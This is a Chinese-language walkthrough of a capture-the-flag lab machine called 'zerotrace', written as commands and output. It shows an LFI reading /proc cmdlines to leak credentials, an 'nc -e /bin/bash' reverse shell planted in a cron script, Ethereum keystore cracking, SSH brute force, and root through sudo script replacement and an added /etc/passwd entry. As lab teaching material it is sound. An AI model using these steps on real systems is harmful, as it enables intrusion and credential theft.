信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.237  08:00:27:71:45:ac       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f3:f4:8b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.049 seconds (124.94 hosts/sec). 4 responded
❯ export ip=192.168.60.237
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.237:22
Open 192.168.60.237:80
Open 192.168.60.237:8000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 10:21 CST
Initiating ARP Ping Scan at 10:21
Scanning 192.168.60.237 [1 port]
Completed ARP Ping Scan at 10:21, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:21
Completed Parallel DNS resolution of 1 host. at 10:21, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:21
Scanning 192.168.60.237 [3 ports]
Discovered open port 80/tcp on 192.168.60.237
Discovered open port 22/tcp on 192.168.60.237
Discovered open port 8000/tcp on 192.168.60.237
Completed SYN Stealth Scan at 10:21, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.237
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-03-14 10:21:52 CST for 0s

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 64
80/tcp   open  http     syn-ack ttl 64
8000/tcp open  http-alt syn-ack ttl 64
MAC Address: 08:00:27:71:45:AC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

枚举目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.237
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 9120]
/images               (Status: 301) [Size: 169] [--> http://192.168.60.237/images/]
/assets               (Status: 301) [Size: 169] [--> http://192.168.60.237/assets/]
/generic.html         (Status: 200) [Size: 5918]
/elements.html        (Status: 200) [Size: 22072]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

好像没有什么有价值的信息

尝试访问8000端口

发现是由python编写的ftp服务

匿名用户无法登录

❯ nc $ip 8000
220 pyftpdlib 1.5.7 ready.
ls
^C
❯ ftp anonymous@$ip 8000
Connected to 192.168.60.237.
220 pyftpdlib 1.5.7 ready.
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp> exit
221 Goodbye.

其余没有任何信息了，那只能尝试换个字典再次枚举目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.237
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 9120]
/.                    (Status: 200) [Size: 9120]
/.admin               (Status: 301) [Size: 169] [--> http://192.168.60.237/.admin/]
Progress: 176625 / 176630 (100.00%)
===============================================================
Finished
===============================================================

在.admin目录下，再次尝试枚举

得到tool.php页面，不过返回为空

❯ gobuster dir -u http://$ip/.admin/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.237/.admin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tool.php             (Status: 200) [Size: 0]
Progress: 176625 / 176630 (100.00%)
===============================================================
Finished
===============================================================

LFI文件包含

因此猜测含有LFI漏洞，尝试模糊测试一下

得到file参数

❯ wfuzz -c -u "http://$ip/.admin/tool.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.237/.admin/tool.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000741:   200        24 L     28 W       1163 Ch     "file"

尝试读取一下/etc/passwd，发现系统中存在三个用户

❯ curl -s 'http://192.168.60.237/.admin/tool.php?file=/etc/passwd' |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
ll104567:x:1000:1000::/home/ll104567:/bin/bash
J4ckie0x17:x:1002:1002:,,,:/home/J4ckie0x17:/bin/bash
shelldredd:x:1003:1003::/home/shelldredd:/bin/bash

不过我尝试了一下读取用户私钥，没法读

除了passwd和hosts可以读外，并没有发现其他文件可读

❯ wfuzz -c -u "http://$ip/.admin/tool.php?file=FUZZ" -w ../thl/file_inclusion_linux.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.237/.admin/tool.php?file=FUZZ
Total requests: 2299

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000899:   200        7 L      22 W       189 Ch      "/etc/hosts"
000001016:   200        24 L     28 W       1163 Ch     "/etc/passwd"

Total time: 2.391690
Processed Requests: 2299
Filtered Requests: 2297
Requests/sec.: 961.2446

模糊测试

我尝试读取/proc/sched_debug内核调度信息，无果

不过可以读取每个进程的cmdline，因此可以尝试枚举全部的cmdline

发现pid为329的进程返回值比较多

❯ wfuzz -c -u "http://$ip/.admin/tool.php?file=/proc/FUZZ/cmdline" -z range,1-1000 --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.237/.admin/tool.php?file=/proc/FUZZ/cmdline
Total requests: 1000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        0 L      1 W        11 Ch       "1"
000000231:   200        0 L      1 W        27 Ch       "231"
000000204:   200        0 L      1 W        30 Ch       "204"
000000340:   200        0 L      1 W        109 Ch      "340"
000000337:   200        0 L      1 W        140 Ch      "337"
000000329:   200        0 L      12 W       120 Ch      "329"
000000315:   200        0 L      1 W        18 Ch       "315"
000000307:   200        0 L      1 W        28 Ch       "307"
000000305:   200        0 L      1 W        105 Ch      "305"
000000303:   200        0 L      1 W        18 Ch       "303"
000000379:   200        0 L      3 W        43 Ch       "379"
000000367:   200        0 L      4 W        78 Ch       "367"
000000437:   200        0 L      3 W        49 Ch       "437"
000000436:   200        0 L      9 W        71 Ch       "436"
000000430:   200        0 L      8 W        56 Ch       "430"
000000801:   200        0 L      3 W        78 Ch       "801"
000000794:   200        0 L      3 W        78 Ch       "794"
000000793:   200        0 L      3 W        78 Ch       "793"
000000792:   200        0 L      3 W        78 Ch       "792"

Total time: 1.055091
Processed Requests: 1000
Filtered Requests: 981
Requests/sec.: 947.7847

尝试curl一下

得到凭证J4ckie0x17:uhIpiRnUBwAHaG.EkeN-oKUfozESUnx3zCIxpuhAd

1
2

❯ curl  'http://192.168.60.237/.admin/tool.php?file=/proc/329/cmdline' --output -
/bin/sh-cpython3 -m pyftpdlib -p 8000 -w -d /var/www/html/ -u J4ckie0x17 -P uhIpiRnUBwAHaG.EkeN-oKUfozESUnx3zCIxpuhAd%

用户提权

尝试利用此凭证ssh连接一下

❯ ssh J4ckie0x17@$ip
The authenticity of host '192.168.60.237 (192.168.60.237)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.237' (ED25519) to the list of known hosts.
[email protected]'s password:
J4ckie0x17@zerotrace:~$ ls -al
total 28
drwx------ 3 J4ckie0x17 J4ckie0x17 4096 mar 11 21:20 .
drwxr-xr-x 5 root       root       4096 mar 11 23:39 ..
lrwxrwxrwx 1 root       root          9 mar 11 20:38 .bash_history -> /dev/null
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17  220 mar 11 18:37 .bash_logout
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17 3526 mar 11 18:37 .bashrc
drwxr-xr-x 3 J4ckie0x17 J4ckie0x17 4096 mar 11 18:37 .local
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17  807 mar 11 18:37 .profile
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17   66 mar 11 18:37 .selected_editor
J4ckie0x17@zerotrace:~$ sudo -l
[sudo] contraseña para J4ckie0x17:
Sorry, user J4ckie0x17 may not run sudo on zerotrace.

通过信息收集，发现在opt/.nobodyshouldreadthis存在提示

1
2
3

J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ cat destiny
I don't know where it (or they) will take me, but I will always know that Windows is trash.
我不知道它（或它们）会把我带到哪里，但我永远知道Windows是垃圾。

此外我还上传了pspy64监测系统运行进程

从中得知用户UID1003会定期运行destiny文件

2025/04/02 08:21:27 CMD: UID=0     PID=1      | /sbin/init
2025/04/02 08:22:01 CMD: UID=1003  PID=12419  | /bin/sh -c /bin/bash /opt/.nobodyshouldreadthis/destiny
2025/04/02 08:22:01 CMD: UID=0     PID=12418  | /usr/sbin/CRON -f
------------------------------------------
J4ckie0x17@zerotrace:/tmp$ id 1003
uid=1003(shelldredd) gid=1003(shelldredd) grupos=1003(shelldredd)

并且此文件我们拥有修改权限

J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ ls -al
total 12
drwxrwxrwx 2 shelldredd shelldredd 4096 mar 12 16:00 .
drwxr-xr-x 4 root       root       4096 mar 11 23:43 ..
-rwxrw-rw- 1 shelldredd shelldredd   92 mar 12 16:00 destiny

lsattr 命令用于显示文件的扩展属性

1 2	J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ lsattr destiny ----i---------e------- destiny

i（Immutable，不可变）：该文件无法被删除、修改、重命名，甚至无法创建硬链接，除非使用 chattr -i 移除该属性。

e（Extents）：表示该文件使用 extents 进行存储（一般用于 ext4 文件系统）。

我们将文件的i属性进行修改

J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ chattr -i destiny
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ lsattr destiny
--------------e------- destiny
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ echo "nc -e /bin/bash 192.168.60.100 4444" > destiny

ETH爆破

监听一下端口

❯ pwncat-cs -lp 4444
[14:32:52] Welcome to pwncat 🐈!                            __main__.py:164
[14:33:02] received connection from 192.168.60.237:53718         bind.py:84
[14:33:03] 0.0.0.0:4444: normalizing shell path              manager.py:957
           192.168.60.237:53718: registered new host w/ db   manager.py:957
(local) pwncat$
(remote) shelldredd@zerotrace:/home/shelldredd$

回到opt目录下还有个文件仅shelldredd可读

(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ ls -al
total 256
drwx------ 2 shelldredd shelldredd   4096 mar 12 15:38 .
drwx------ 3 shelldredd shelldredd   4096 mar 11 23:42 ..
-rwx------ 1 shelldredd shelldredd    142 mar 11 23:45 notes.txt
-rwx------ 1 shelldredd shelldredd    492 mar 11 23:43 secret
-rw-r--r-- 1 shelldredd shelldredd 245179 mar 12 15:36 why.png
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ cat notes.txt
我要在这里写下我的愿望：

在10秒内完成魔方

让The Flash（闪电侠）跑得更慢

在哔哩哔哩上达到1000个视频
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ cat secret
{"address":"2891efcaa457d4d44dc724c4fa015fe8be4e279e","crypto":{"cipher":"aes-128-ctr","ciphertext":"fee023fd8fcd5b242b0ad4900de2d4614fa4be48887efbd6208a9beb65923df7","cipherparams":{"iv":"7183f2eea51e68d818fe976daf18327d"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"abb71ccb91d0ec97831d49694bd80ce925c0204772fa6268ace1f73df97e3d71"},"mac":"4ed5177b17ad85eafafd3dedc40a3c85914d18611c2cca079871a28487055892"},"id":"0c431e07-6087-4368-a973-ed3fb4ec5045","version":3}
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ file why.png
why.png: PNG image data, 541 x 378, 8-bit/color RGB, non-interlaced
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$
(local) pwncat$ download why.png
why.png ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 245.2/245.2 kB • ? • 0:00:00
[14:37:14] downloaded 245.18KiB in 0.14 seconds                                                                                         download.py:71
(local) pwncat$

看一下图片，哈哈川普🤣

你是被选择的那个

怀疑可能存在图片隐写，分析得到存在公私钥文件

然而并没什么软用

❯ zsteg why.png
imagedata           .. text: "%$\"---!!"
b1,r,msb,xy         .. file: OpenPGP Public Key
b1,g,lsb,xy         .. file: OpenPGP Public Key
b1,b,lsb,xy         .. file: OpenPGP Secret Key
b2,rgb,lsb,xy       .. file: OpenPGP Secret Key
b3,b,lsb,xy         .. text: "V@NKx)I,,K"
b4,r,lsb,xy         .. text: "vd23TdC3V"
b4,r,msb,xy         .. file: OpenPGP Secret Key
b4,g,lsb,xy         .. text: "fD33\"3EVx"
b4,b,lsb,xy         .. text: "#3D#3EgVeUw"
b4,rgb,lsb,xy       .. text: "u6tgTd5RD5Sv\\"
b4,bgr,lsb,xy       .. text: "5tvWddU4BU6s"

并且secret我丢给GPT分析了一下

得知是以太坊钱包的私钥内容，并且被加密了

尝试利用john爆破一下

不过非常慢，大概等了一会就出结果了

得到密钥dragonballz

❯ vi secret
❯ ethereum2john secret >hash
WARNING: Upon successful password recovery, this hash format may expose your PRIVATE KEY. Do not share extracted hashes with any untrusted parties!
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ethereum, Ethereum Wallet [PBKDF2-SHA256/scrypt Keccak 256/256 AVX2 8x])
Cost 1 (iteration count) is 262144 for all loaded hashes
Cost 2 (kdf [0:PBKDF2-SHA256 1:scrypt 2:PBKDF2-SHA256 presale]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz      (secret)
1g 0:00:04:34 DONE (2025-04-02 14:59) 0.003646g/s 11.66p/s 11.66c/s 11.66C/s grecia..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

除此之外，我们还在用户ll104567的家目录下发现一个可读文件

提示需要合并两个宇宙，那就是eth以太坊和此字典结合在以一起

(remote) shelldredd@zerotrace:/home/ll104567$ cat one
Why don't we join two universes and see who's the strongest?
为什么我们不合并两个宇宙，看看谁更强大？
saitama
genos
mumen
speed-o
fubuki
bang
tatsumaki
boros
drkuseno
onepunchman
karin
zombieman
childemperor
stinger

处理一下文本

尝试爆破一下，得到凭证ll104567:dragonballzonepunchman

❯ vi dic.txt
❯ awk '{print "dragonballz" $1 ;print $1 "dragonballz"}' dic.txt>pass.txt
❯ hydra -l ll104567 -P pass.txt $ip ssh -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-02 15:07:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:1/p:30), ~2 tries per task
[DATA] attacking ssh://192.168.60.237:22/
[22][ssh] host: 192.168.60.237   login: ll104567   password: dragonballzonepunchman
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-02 15:08:02

Root提权

ssh连接一下

❯ ssh ll104567@$ip
[email protected]'s password:
ll104567@zerotrace:~$ cat user.txt
yLFsSkfsLjQQKm49HCkwBtiY60ESXH3s

可以看到用户拥有sudo权限

可以执行一个bash脚本

ll104567@zerotrace:~$ sudo -l
Matching Defaults entries for ll104567 on zerotrace:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ll104567 may run the following commands on zerotrace:
    (ALL) NOPASSWD: /bin/bash /home/ll104567/guessme
ll104567@zerotrace:~$ file guessme
guessme: Bourne-Again shell script, ASCII text executable
ll104567@zerotrace:~$ cat guessme
#!/bin/bash
FTP_USER="admin"
FTP_PASS=$(cat /root/.creds)

echo -n "Please provide the password for $FTP_USER: "
read -s INPUT_PASS
echo

CLEAN_PASS=$(echo "$INPUT_PASS" | sed 's/[[:space:]]//g')

if [[ $FTP_PASS == $CLEAN_PASS ]]; then
    echo "Password matches!"
    exit 0
else
    echo "Access denied!"
    exit 1
fi

我尝试输入*，即可通过if检查

1
2
3

ll104567@zerotrace:~$ sudo /bin/bash /home/ll104567/guessme
Please provide the password for admin:
Password matches!

但此文件是在用户家目录下的，我们直接改个名字不就完了😅

重新写个脚本，执行即可

ll104567@zerotrace:~$ mv guessme 11
ll104567@zerotrace:~$ echo "cp /bin/bash /tmp/sh;chmod +s /tmp/sh">guessme
ll104567@zerotrace:~$ chmod +x guessme
ll104567@zerotrace:~$ sudo /bin/bash /home/ll104567/guessme
ll104567@zerotrace:~$ cd /tmp/
ll104567@zerotrace:/tmp$ ls
linpeas.sh  pspy64  sh  systemd-private-9eedb78f1cd3445d8fa1f3f69f9ff682-systemd-logind.service-mXg3PA
ll104567@zerotrace:/tmp$ ./sh -p
sh-5.2# whoami
root
sh-5.2# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>/etc/passwd
sh-5.2# exit
exit
ll104567@zerotrace:/tmp$ su primary
Contraseña:
root@zerotrace:/tmp# cd ~
root@zerotrace:~# cat root.txt
0IB3gKtQ82ZBpyvwDo1Gp55snCElXC7U